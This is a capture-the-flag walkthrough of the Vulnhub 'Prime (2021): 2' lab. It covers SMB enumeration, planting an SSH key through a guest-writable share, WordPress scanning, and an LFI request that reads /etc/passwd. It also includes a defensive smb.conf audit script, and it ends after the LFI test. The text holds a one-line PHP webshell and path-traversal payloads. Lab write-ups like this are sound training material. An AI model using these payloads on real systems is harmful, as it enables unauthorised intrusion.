[Vulnhub Lab] [Prime (2021): 2] [Easy - Medium] [20210509]

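1. Environment overview

Lab page: https://www.vulnhub.com/entry/prime-2021-2,696/
Lab download: https://download.vulnhub.com/prime-2021/Prime-2.ova
Difficulty: Easy - Medium
Release date: May 9, 2021
File size: 3.7 GB
Author: Sura
Series: Prime (2021)
Description

  • This virtual machine will give you some real concepts needed for global-level certifications. You will like this VM because it is a perfect blend of network and web testing.
  • Open it with VMware; it does not work with VirtualBox

Time spent: 4+ hours. There are two routes through the box and both end in the same place; it is fairly conventional and the path is clear. For practice, I also tried a few other approaches.
Key points

  1. SMB information gathering and operations
  2. Web directory scanning, WordPress CMS scanning
  3. LXD privilege escalation

2. Host discovery and port scanning

  • Attacker IP: 192.168.110.139
  • Target IP: 192.168.110.138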
(base) ┌──(root㉿kali)-[~]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:5c:06:40, IPv4: 192.168.110.139
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.110.1   00:50:56:c0:00:01       VMware, Inc.
192.168.110.138 00:0c:29:52:42:78       VMware, Inc.
192.168.110.254 00:50:56:e0:2b:92       VMware, Inc.

3 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.318 seconds (110.44 hosts/sec). 3 responded
(base) ┌──(root㉿kali)-[~]
└─# nmap -T4 -sC -sV -p- -A --min-rate=1000 192.168.110.138
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-04 00:32 EST
Nmap scan report for 192.168.110.138
Host is up (0.0017s latency).
Not shown: 65530 closed tcp ports (reset)
PORT      STATE SERVICE     VERSION
22/tcp    open  ssh         OpenSSH 8.4p1 Ubuntu 5ubuntu1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 0a:16:3f:c8:1a:7d:ff:f5:7a:66:05:63:76:7c:5a:95 (RSA)
|   256 7f:47:44:cc:d1:c4:b7:54:de:4f:27:f2:39:38:ff:6e (ECDSA)
|_  256 f5:d3:36:44:43:40:3d:11:9b:d1:a6:24:9f:99:93:f7 (ED25519)
80/tcp    open  http        Apache httpd 2.4.46 ((Ubuntu))
|_http-server-header: Apache/2.4.46 (Ubuntu)
|_http-title: HackerCTF
139/tcp   open  netbios-ssn Samba smbd 4.6.2
445/tcp   open  netbios-ssn Samba smbd 4.6.2
10123/tcp open  http        SimpleHTTPServer 0.6 (Python 3.9.4)
|_http-title: Directory listing for /
|_http-server-header: SimpleHTTP/0.6 Python/3.9.4
MAC Address: 00:0C:29:52:42:78 (VMware)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
|_nbstat: NetBIOS name: HACKERCTFLAB, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb2-time: 
|   date: 2023-12-04T13:33:03
|_  start_date: N/A
|_clock-skew: 7h59m49s

TRACEROUTE
HOP RTT     ADDRESS
1   1.69 ms 192.168.110.138

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 42.70 seconds

3. Accessing the ports

3.1. Port 22 - SSH

  • Initial access attempt, to see what information the prompt gives away
(base) ┌──(root㉿kali)-[~]
└─# ssh 192.168.110.138                    
The authenticity of host '192.168.110.138 (192.168.110.138)' can't be established.
ED25519 key fingerprint is SHA256:nB+xRANNsBufP64KnDjxamkvfGVw1eJUiz/kCMnJ9wU.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.110.138' (ED25519) to the list of known hosts.
root@192.168.110.138's password: 
Permission denied, please try again.
root@192.168.110.138's password: 
Permission denied, please try again.
root@192.168.110.138's password: 
root@192.168.110.138: Permission denied (publickey,password).

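3.2. Ports 139/445 - SMB

  • Wow, this single command took an hour... luckily it paid off! (●´∀`●)ノ
  • Information obtained:
    • There is a shared folder that needs no password: //192.168.110.138/welcome
      • Verified to be "/home/jarves"
    • Found a user, jarves, whose home directory has mode 755
    • Found a one-line webshell under the home directory
      • Next, focus on finding a file inclusion vulnerability (LFI)
    • From the database history file: _HiStOrY_V2_
    • Testing shows that files can be uploaded!!!
      • Try uploading ".ssh" files for passwordless login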
(base) ┌──(root㉿kali)-[~]
└─# enum4linux 192.168.110.138
Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Mon Dec  4 00:44:43 2023

=========================================( Target Information )=========================================

Target ........... 192.168.110.138
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none

==========================( Enumerating Workgroup/Domain on 192.168.110.138 )==========================

[+] Got domain/workgroup name: WORKGROUP

==============================( Nbtstat Information for 192.168.110.138 )==============================

Looking up status of 192.168.110.138
        HACKERCTFLAB    <00> -         B <ACTIVE>  Workstation Service
        HACKERCTFLAB    <03> -         B <ACTIVE>  Messenger Service
        HACKERCTFLAB    <20> -         B <ACTIVE>  File Server Service
        WORKGROUP       <00> - <GROUP> B <ACTIVE>  Domain/Workgroup Name
        WORKGROUP       <1e> - <GROUP> B <ACTIVE>  Browser Service Elections

        MAC Address = 00-00-00-00-00-00

==================================( Session Check on 192.168.110.138 )==================================

[+] Server 192.168.110.138 allows sessions using username '', password ''

===============================( Getting domain SID for 192.168.110.138 )===============================

Domain Name: WORKGROUP
Domain Sid: (NULL SID)

[+] Can't determine if host is part of domain or part of a workgroup

=================================( OS information on 192.168.110.138 )=================================

[E] Can't get OS info with smbclient

[+] Got OS info for 192.168.110.138 from srvinfo:
        HACKERCTFLAB   Wk Sv PrQ Unx NT SNT hackerctflab server (Samba, Ubuntu)
        platform_id     :       500
        os version      :       6.1
        server type     :       0x809a03

======================================( Users on 192.168.110.138 )======================================

Use of uninitialized value $users in print at ./enum4linux.pl line 972.
Use of uninitialized value $users in pattern match (m//) at ./enum4linux.pl line 975.

Use of uninitialized value $users in print at ./enum4linux.pl line 986.
Use of uninitialized value $users in pattern match (m//) at ./enum4linux.pl line 988.

================================( Share Enumeration on 192.168.110.138 )================================

smbXcli_negprot_smb1_done: No compatible protocol selected by server.

        Sharename       Type      Comment
        ---------       ----      -------
        print$          Disk      Printer Drivers
        welcome         Disk      Welcome to Hackerctf LAB
        IPC$            IPC       IPC Service (hackerctflab server (Samba, Ubuntu))
Reconnecting with SMB1 for workgroup listing.
Protocol negotiation to server 192.168.110.138 (for a protocol between LANMAN1 and NT1) failed: NT_STATUS_INVALID_NETWORK_RESPONSE
Unable to connect with SMB1 -- no workgroup available

[+] Attempting to map shares on 192.168.110.138

//192.168.110.138/print$        Mapping: DENIED Listing: N/A Writing: N/A
//192.168.110.138/welcome       Mapping: OK Listing: OK Writing: N/A

[E] Can't understand response:

NT_STATUS_OBJECT_NAME_NOT_FOUND listing \*
//192.168.110.138/IPC$  Mapping: N/A Listing: N/A Writing: N/A

==========================( Password Policy Information for 192.168.110.138 )==========================

[+] Attaching to 192.168.110.138 using a NULL share

[+] Trying protocol 139/SMB...

[+] Found domain(s):

        [+] HACKERCTFLAB
        [+] Builtin

[+] Password Info for Domain: HACKERCTFLAB

        [+] Minimum password length: 5
        [+] Password history length: None
        [+] Maximum password age: 37 days 6 hours 21 minutes
        [+] Password Complexity Flags: 000000

                [+] Domain Refuse Password Change: 0
                [+] Domain Password Store Cleartext: 0
                [+] Domain Password Lockout Admins: 0
                [+] Domain Password No Clear Change: 0
                [+] Domain Password No Anon Change: 0
                [+] Domain Password Complex: 0

        [+] Minimum password age: None
        [+] Reset Account Lockout Counter: 30 minutes
        [+] Locked Account Duration: 30 minutes
        [+] Account Lockout Threshold: None
        [+] Forced Log off Time: 37 days 6 hours 21 minutes

[+] Retieved partial password policy with rpcclient:

Password Complexity: Disabled
Minimum Password Length: 5

=====================================( Groups on 192.168.110.138 )=====================================

[+]  Getting builtin groups:
[+]  Getting builtin group memberships:
[+]  Getting local groups:
[+]  Getting local group memberships:
[+]  Getting domain groups:
[+]  Getting domain group memberships:

=================( Users on 192.168.110.138 via RID cycling (RIDS: 500-550,1000-1050) )=================

[I] Found new SID:
S-1-22-1
[I] Found new SID:
S-1-5-32
[I] Found new SID:
S-1-5-32
[I] Found new SID:
S-1-5-32
[I] Found new SID:
S-1-5-32

[+] Enumerating users using SID S-1-5-32 and logon username '', password ''

S-1-5-32-544 BUILTIN\Administrators (Local Group)
S-1-5-32-545 BUILTIN\Users (Local Group)
S-1-5-32-546 BUILTIN\Guests (Local Group)
S-1-5-32-547 BUILTIN\Power Users (Local Group)
S-1-5-32-548 BUILTIN\Account Operators (Local Group)
S-1-5-32-549 BUILTIN\Server Operators (Local Group)
S-1-5-32-550 BUILTIN\Print Operators (Local Group)

[+] Enumerating users using SID S-1-5-21-1614152883-4007063313-3639854138 and logon username '', password ''

S-1-5-21-1614152883-4007063313-3639854138-501 HACKERCTFLAB\nobody (Local User)
S-1-5-21-1614152883-4007063313-3639854138-513 HACKERCTFLAB\None (Domain Group)

[+] Enumerating users using SID S-1-22-1 and logon username '', password ''

S-1-22-1-1000 Unix User\jarves (Local User)

==============================( Getting printer info for 192.168.110.138 )==============================

No printers returned.

enum4linux complete on Mon Dec  4 14:40:39 2023

3.2.1. Passwordless SMB login

  • It looks like the "/home" folder
(base) ┌──(root㉿kali)-[/usr/local/soft/hack]
└─# smbclient //192.168.110.138/welcome                                             
Password for [WORKGROUP\root]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Sat May  8 15:42:49 2021
  ..                                  D        0  Sat May  8 02:38:58 2021
  .mysql_history                      H       18  Sat May  8 15:05:03 2021
  .profile                            H      807  Sat Mar 20 00:02:58 2021
  upload                              D        0  Sun May  9 19:19:02 2021
  .sudo_as_admin_successful           H        0  Sat May  8 13:34:48 2021
  .bash_logout                        H      220  Sat Mar 20 00:02:58 2021
  .cache                             DH        0  Sat May  8 02:39:15 2021
  something                           N       82  Sat May  8 00:18:09 2021
  secrets                             N        0  Sat May  8 00:15:17 2021
  .bash_history                       H       72  Sun May  9 19:23:26 2021
  .bashrc                             H     3771  Sat Mar 20 00:02:58 2021

                19475088 blocks of size 1024. 9580192 blocks available

3.2.2. Information gathering

smb: \> cd upload
smb: \upload\> ls
  .                                   D        0  Sun May  9 19:19:02 2021
  ..                                  D        0  Sat May  8 15:42:49 2021
  shell.php                           A       35  Sun May  9 19:19:02 2021

                19475088 blocks of size 1024. 9580164 blocks available
smb: \> get something
getting file \something of size 82 as something (5.7 KiloBytes/sec) (average 5.7 KiloBytes/sec)
smb: \> get .bash_history bash_history
getting file \.bash_history of size 72 as bash_history (3.3 KiloBytes/sec) (average 4.3 KiloBytes/sec)
smb: \> get .mysql_history mysql_history
getting file \.mysql_history of size 18 as mysql_history (1.5 KiloBytes/sec) (average 54.0 KiloBytes/sec)
smb: \> cd upload
smb: \upload\> get shell.php 
getting file \upload\shell.php of size 35 as shell.php (3.1 KiloBytes/sec) (average 64.5 KiloBytes/sec)
(base) ┌──(root㉿kali)-[/usr/local/soft/hack]
└─# cat something            
I wanted to make it my home directory. But idea must be changed.
Thanks,
jarves
(base) ┌──(root㉿kali)-[/usr/local/soft/hack]
└─# cat bash_history 
sudo su -
ifconfig
ls
cd upload/
ls
ls -l
cd ..
ls -l
chmod 755 jarves/
(base) ┌──(root㉿kali)-[/usr/local/soft/hack]
└─# cat mysql_history   
_HiStOrY_V2_
exit
(base) ┌──(root㉿kali)-[/usr/local/soft/hack]
└─# cat shell.php 
<?php echo system($_GET['cmd']);?>

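3.2.3. Try uploading a key to ".ssh" (at this point we already have a shell)

  • Still, I carry on with the normal information gathering afterwards, otherwise this would be over too quickly (⊙ˍ⊙)
  • You can skip straight to section 7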
(base) ┌──(root㉿kali)-[/usr/local/soft/hack]
└─# ssh-keygen -f patrick
Generating public/private rsa key pair.
Enter passphrase (empty for no passphrase): 
Enter same passphrase again: 
Your identification has been saved in patrick
Your public key has been saved in patrick.pub
The key fingerprint is:
SHA256:XFa0aqVJED/BYuhoEu/ZKkvTVycjqpnBzlsyXJrZZ4s root@kali
The key's randomart image is:
+---[RSA 3072]----+
|       .oo..o    |
|  .   . oo.o .   |
|   o o . .* o    |
|  . + .. + *     |
|   +.o. S *      |
| o Bo..o =       |
|  % =.+          |
| +.X.= .         |
|  O+E .          |
+----[SHA256]-----+
(base) ┌──(root㉿kali)-[/usr/local/soft/hack]
└─# cp patrick.pub authorized_keys
(base) ┌──(root㉿kali)-[/usr/local/soft/hack]
└─# chmod 600 patrick
(base) ┌──(root㉿kali)-[/usr/local/soft/hack]
└─# smbclient //192.168.110.138/welcome
Password for [WORKGROUP\root]:
Try "help" to get a list of possible commands.
smb: \> mkdir .ssh
smb: \> cd .ssh
smb: \.ssh\> put authorized_keys 
putting file authorized_keys as \.ssh\authorized_keys (68.7 kb/s) (average 68.7 kb/s)
smb: \.ssh\> ls
  .                                   D        0  Mon Dec  4 21:51:11 2023
  ..                                  D        0  Mon Dec  4 21:51:01 2023
  authorized_keys                     A      563  Mon Dec  4 21:51:11 2023

                19475088 blocks of size 1024. 10125796 blocks available
smb: \.ssh\> exit
(base) ┌──(root㉿kali)-[/usr/local/soft/hack]
└─# ssh jarves@192.168.110.138 -i patrick
Welcome to Ubuntu 21.04 (GNU/Linux 5.11.0-16-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Mon Dec  4 01:52:40 PM UTC 2023

  System load: 0.11               Memory usage: 17%   Processes:       233
  Usage of /:  42.8% of 18.57GB   Swap usage:   0%    Users logged in: 0

  => There were exceptions while processing one or more plugins. See
     /var/log/landscape/sysinfo.log for more information.

 * Pure upstream Kubernetes 1.21, smallest, simplest cluster ops!

     https://microk8s.io/

9 updates can be installed immediately.
0 of these updates are security updates.
To see these additional updates run: apt list --upgradable

The list of available updates is more than a week old.
To check for new updates run: sudo apt update

Last login: Sun May  9 11:14:10 2021
jarves@hackerctflab:~$
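
The share used above is guest-accessible, writable, and mapped onto jarves's home directory, which is what allowed both the history files to be read and .ssh/authorized_keys to be created. As an added example (not part of the original write-up or the lab author's material), this Python audit flags that combination in a Samba configuration; the smb.conf text, the [archive] and [docs] shares, and all function names are constructed for illustration, because the page does not show the target's real configuration.

```python
import posixpath

# Constructed smb.conf modelled on what enum4linux reported for this host.
# The [archive] and [docs] shares are invented to exercise the other branches.
SAMPLE_SMB_CONF = """\
[global]
   workgroup = WORKGROUP
   map to guest = bad user

[welcome]
   comment = Welcome to Hackerctf LAB
   path = /home/jarves
   guest ok = yes
   read only = no

[archive]
   ; constructed: guest-readable directory inside a home directory
   path = /home/jarves/archive
   public = yes

[docs]
   path = /srv/samba/docs
   guest ok = yes
   writable = no
"""

TRUE_VALUES = {"yes", "true", "on", "1"}


def parse_smb_conf(text):
    """Parse smb.conf into {section: {param: value}}.

    Samba ignores case and whitespace inside parameter names, so
    'Guest OK' and 'guestok' are stored under the same key.
    """
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].strip().lower()
            sections.setdefault(current, {})
        elif "=" in line and current is not None:
            key, value = line.split("=", 1)
            sections[current]["".join(key.lower().split())] = value.strip()
    return sections


def _truthy(params, names, default):
    for name in names:
        if name in params:
            return params[name].lower() in TRUE_VALUES
    return default


def guest_allowed(params):
    # 'public' is a synonym of 'guest ok'; the default is no.
    return _truthy(params, ("guestok", "public"), False)


def writable(params):
    # 'read only' is the inverse of 'writeable' / 'writable' / 'write ok'.
    # Simplification: if both forms appear, 'read only' wins here.
    if "readonly" in params:
        return params["readonly"].lower() not in TRUE_VALUES
    return _truthy(params, ("writeable", "writable", "writeok"), False)


def under_home(path):
    p = posixpath.normpath(path)
    return p in ("/home", "/root") or p.startswith(("/home/", "/root/"))


def audit(text):
    """Return (share, path, severity) for every risky guest share."""
    sections = parse_smb_conf(text)
    defaults = sections.get("global", {})
    findings = []
    for name, own in sections.items():
        if name == "global":
            continue
        params = {**defaults, **own}   # share settings override [global]
        path = params.get("path", "")
        if not guest_allowed(params):
            continue
        if writable(params) and under_home(path):
            # Anonymous clients can plant .ssh/authorized_keys or shell rc files.
            findings.append((name, path, "critical"))
        elif writable(params):
            findings.append((name, path, "high"))
        elif under_home(path):
            # Read-only still leaks history files and dotfiles.
            findings.append((name, path, "medium"))
    return findings


if __name__ == "__main__":
    for share, path, severity in audit(SAMPLE_SMB_CONF):
        print(f"{severity:8} [{share}] {path}")
```

On a real server, feed it the output of `testparm -s`, which prints the effective configuration.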

3.3. Port 80 - Web

  • Summary of information obtained:
    • A ".git" directory is exposed
    • "WordPress" is present
    • The "server" directory contains an archive file

3.3.1. Directory scanning

# Small basic wordlist, first-pass scan
dirb http://192.168.110.138
# More thorough (conda activate py37)
dirsearch -u http://192.168.110.138 -t 64 -e *
# Includes static checks (conda activate py310)
cd ~/dirsearch_bypass403 ; python dirsearch.py -u "http://192.168.110.138" -j yes -b yes
# More thorough, plus (conda activate py39)
cd ~/soft/dirmap ; python3 dirmap.py -i http://192.168.110.138 -lcf
# Common file scan
gobuster dir -u http://192.168.110.138 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 64 -x txt,php,html,conf -e -k -r -q
# Executable/script file scan
gobuster dir -u http://192.168.110.138 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 64 -x js,aspx,cgi,sh,jsp -e -k -r -q
# Archive and backup file scan
gobuster dir -u http://192.168.110.138 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 64 -x rar,zip,7z,tar.gz,bak,php.bak,txt,old,temp -e -k -r -q
  • http://192.168.110.138/index.html
  • http://192.168.110.138/wp/index.php
  • http://192.168.110.138/wp/wp-login.php
  • http://192.168.110.138/css/
  • http://192.168.110.138/images/
  • http://192.168.110.138/javascript/
  • http://192.168.110.138/server/
  • http://192.168.110.138/wp/
  • http://192.168.110.138/wp/.git/
  • http://192.168.110.138/wp/wp-admin/
  • http://192.168.110.138/wp/wp-content/uploads/


3.3.2. Download and extract the file from "server"

  • It is a CMS with an RCE vulnerability, but at this point it is not clear where it is used
(base) ┌──(root㉿kali)-[/usr/local/soft/hack]
└─# unzip 45f8b764b45cdb6d75cda2ab01231293-gila-1.10.9.zip
Archive:  45f8b764b45cdb6d75cda2ab01231293-gila-1.10.9.zip
14b1c3e707ec8cd33b353c7b2ec7067202933cd2
   creating: gila-1.10.9/
......
(base) ┌──(root㉿kali)-[/usr/local/soft/hack]
└─# cd gila-1.10.9
(base) ┌──(root㉿kali)-[/usr/local/soft/hack/gila-1.10.9]
└─# ls -al
总计 68
drwxr-xr-x  9 root root 4096 2019年 7月10日 .
drwxr-xr-x  5 root root 4096 12月 4日 19:39 ..
-rw-r--r--  1 root root  241 2019年 7月10日 app.yaml
drwxr-xr-x  2 root root 4096 2019年 7月10日 assets
-rw-r--r--  1 root root  131 2019年 7月10日 composer.json
-rwxr-xr-x  1 root root  653 2019年 7月10日 config.default.php
-rw-r--r--  1 root root  639 2019年 7月10日 Dockerfile
-rwxr-xr-x  1 root root 1065 2019年 7月10日 .htaccess
-rwxr-xr-x  1 root root  143 2019年 7月10日 index.php
drwxr-xr-x 11 root root 4096 2019年 7月10日 lib
-rwxr-xr-x  1 root root 1526 2019年 7月10日 LICENSE
drwxr-xr-x  2 root root 4096 2019年 7月10日 log
-rw-r--r--  1 root root   65 2019年 7月10日 robots.txt
drwxr-xr-x  2 root root 4096 2019年 7月10日 sites
drwxr-xr-x  9 root root 4096 2019年 7月10日 src
drwxr-xr-x  4 root root 4096 2019年 7月10日 themes
drwxr-xr-x  2 root root 4096 2019年 7月10日 tmp


3.3.3. Download ".git"

  • Opening it produced an error and I found no way around it, so it is set aside for now
(py27) ┌──(root㉿kali)-[/usr/local/soft/GitHack]
└─# python GitHack.py http://192.168.110.138/wp/.git/

  ____ _ _   _   _            _
 / ___(_) |_| | | | __ _  ___| | __
| |  _| | __| |_| |/ _` |/ __| |/ /
| |_| | | |_|  _  | (_| | (__|   <
 \____|_|\__|_| |_|\__,_|\___|_|\_\{0.0.5}
 A '.git' folder disclosure exploit.

[*] Check Depends
[+] Check depends end
[*] Set Paths
[*] Target Url: http://192.168.110.138/wp/.git/
[*] Initialize Target
[*] Try to Clone straightly
[*] Clone
正克隆到 '/usr/local/soft/GitHack/dist/192.168.110.138'...
致命错误:仓库 'http://192.168.110.138/wp/.git/' 未找到
[-] Clone Error
[*] Try to Clone with Directory Listing
[*] http://192.168.110.138/wp/.git/ is support Directory Listing
[*] Initialize Git
[!] Initialize Git Error: 提示:使用 'master' 作为初始分支的名称。这个默认分支名称可能会更改。要在新仓 库中
提示:配置使用初始分支名,并消除这条警告,请执行:
提示:
提示:  git config --global init.defaultBranch <名称>
提示:
提示:除了 'master' 之外,通常选定的名字有 'main''trunk''development'。
提示:可以通过以下命令重命名刚创建的分支:
提示:
提示:  git branch -m <name>
......
[*] objects/3d/4f6056f57c26f22d4d2b0c3068731de0074040
[*] objects/34/1a6dc84dc556eb30ac23b7ac42858e6ce128a6
[*] Valid Repository
[*] Valid Repository Fail
[-] Clone With Cache end. But missed some files.
[+] Clone Success. Dist File : /usr/local/soft/GitHack/dist/192.168.110.138

3.3.4. WordPress CMS scan

  • Version: WordPress version 5.8
  • Theme: http://192.168.110.138/wp/wp-content/themes/twentytwentyone/
  • Vulnerability: plugin vulnerability - CVE-2019-9618 (LFI) (46537) (only reported when scanning with an api-token)
  • User: admin
(base) ┌──(root㉿kali)-[/usr/local/soft/hack]
└─# wpscan --url=http://192.168.110.138/wp/ --ignore-main-redirect --force -e --plugins-detection aggressive --api-token [token]
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.25
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://192.168.110.138/wp/ [192.168.110.138]
[+] Started: Mon Dec  4 19:30:43 2023

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.46 (Ubuntu)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://192.168.110.138/wp/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://192.168.110.138/wp/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Upload directory has listing enabled: http://192.168.110.138/wp/wp-content/uploads/
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://192.168.110.138/wp/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 5.8 identified (Insecure, released on 2021-07-20).
 | Found By: Emoji Settings (Passive Detection)
 |  - http://192.168.110.138/wp/, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=5.8'
 | Confirmed By: Meta Generator (Passive Detection)
 |  - http://192.168.110.138/wp/, Match: 'WordPress 5.8'
 |
 | [!] 36 vulnerabilities identified:
 |
 | [!] Title: WordPress 5.4 to 5.8 - Data Exposure via REST API
 |     Fixed in: 5.8.1
 |     References:
 |      - https://wpscan.com/vulnerability/38dd7e87-9a22-48e2-bab1-dc79448ecdfb
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-39200
 |      - https://wordpress.org/news/2021/09/wordpress-5-8-1-security-and-maintenance-release/
 |      - https://github.com/WordPress/wordpress-develop/commit/ca4765c62c65acb732b574a6761bf5fd84595706
 |      - https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-m9hc-7v5q-x8q5
 |
......
[+] WordPress theme in use: twentytwentyone
 | Location: http://192.168.110.138/wp/wp-content/themes/twentytwentyone/
 | Last Updated: 2023-11-07T00:00:00.000Z
 | Readme: http://192.168.110.138/wp/wp-content/themes/twentytwentyone/readme.txt
 | [!] The version is out of date, the latest version is 2.0
 | Style URL: http://192.168.110.138/wp/wp-content/themes/twentytwentyone/style.css?ver=1.3
 | Style Name: Twenty Twenty-One
 | Style URI: https://wordpress.org/themes/twentytwentyone/
 | Description: Twenty Twenty-One is a blank canvas for your ideas and it makes the block editor your best brush. Wi...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Found By: Css Style In Homepage (Passive Detection)
 |
 | Version: 1.3 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://192.168.110.138/wp/wp-content/themes/twentytwentyone/style.css?ver=1.3, Match: 'Version: 1.3'

[+] Enumerating Vulnerable Plugins (via Aggressive Methods)
 Checking Known Locations - Time: 00:00:23 <=====================> (6539 / 6539) 100.00% Time: 00:00:23
[+] Checking Plugin Versions (via Passive and Aggressive Methods)

[i] Plugin(s) Identified:

[+] gracemedia-media-player
 | Location: http://192.168.110.138/wp/wp-content/plugins/gracemedia-media-player/
 | Latest Version: 1.0 (up to date)
 | Last Updated: 2013-07-21T15:09:00.000Z
 | Readme: http://192.168.110.138/wp/wp-content/plugins/gracemedia-media-player/readme.txt
 | [!] Directory listing is enabled
 |
 | Found By: Known Locations (Aggressive Detection)
 |  - http://192.168.110.138/wp/wp-content/plugins/gracemedia-media-player/, status: 200
 |
 | [!] 1 vulnerability identified:
 |
 | [!] Title: GraceMedia Media Player 1.0 - Local File Inclusion (LFI)
 |     References:
 |      - https://wpscan.com/vulnerability/a4f5b10f-3386-45cc-9548-dd7bbea199d6
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9618
 |      - https://www.exploit-db.com/exploits/46537/
 |      - https://seclists.org/fulldisclosure/2019/Mar/26
 |
 | Version: 1.0 (100% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - http://192.168.110.138/wp/wp-content/plugins/gracemedia-media-player/readme.txt
 | Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
 |  - http://192.168.110.138/wp/wp-content/plugins/gracemedia-media-player/readme.txt
......
[i] User(s) Identified:

[+] admin
 | Found By: Author Posts - Author Pattern (Passive Detection)
 | Confirmed By:
 |  Rss Generator (Passive Detection)
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] WPScan DB API OK
 | Plan: free
 | Requests Done (during the scan): 4
 | Requests Remaining: 21

[+] Finished: Mon Dec  4 19:31:36 2023
[+] Requests Done: 10113
[+] Cached Requests: 12
[+] Data Sent: 2.832 MB
[+] Data Received: 1.891 MB
[+] Memory used: 253.559 MB
[+] Elapsed time: 00:00:52

3.4. Port 10123 - web service over the SMB share

  • Clicking a file downloads it


4. 46537: CVE-2019-9618 (LFI) exploitation

4.1. Download the exploit and review how it is used

(base) ┌──(root㉿kali)-[/usr/local/soft/hack]
└─# searchsploit 46537
-------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                      |  Path
-------------------------------------------------------------------- ---------------------------------
WordPress Plugin GraceMedia Media Player 1.0 - Local File Inclusion | php/webapps/46537.txt
-------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
(base) ┌──(root㉿kali)-[/usr/local/soft/hack]
└─# searchsploit -m 46537.txt
  Exploit: WordPress Plugin GraceMedia Media Player 1.0 - Local File Inclusion
      URL: https://www.exploit-db.com/exploits/46537
     Path: /usr/share/exploitdb/exploits/php/webapps/46537.txt
    Codes: CVE-2019-9618
 Verified: False
File Type: Unicode text, UTF-8 text
Copied to: /usr/local/soft/hack/46537.txt

(base) ┌──(root㉿kali)-[/usr/local/soft/hack]
└─# cat 46537.txt 
=============================================
MGC ALERT 2019-001
- Original release date: February 06, 2019
- Last revised:  March 13, 2019
- Discovered by: Manuel García Cárdenas
- Severity: 7/10 (CVSS Base Score)
- CVE-ID: CVE-2019-9618
=============================================
......
GET
/wordpress/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=../../../../../../../../../../etc/passwd
......

4.2. Building the PoC

4.2.1. Verify the vulnerability

(base) ┌──(root㉿kali)-[/usr/local/soft/hack]
└─# curl "http://192.168.110.138/wp/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=../../../../../../../../../../etc/passwd"
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
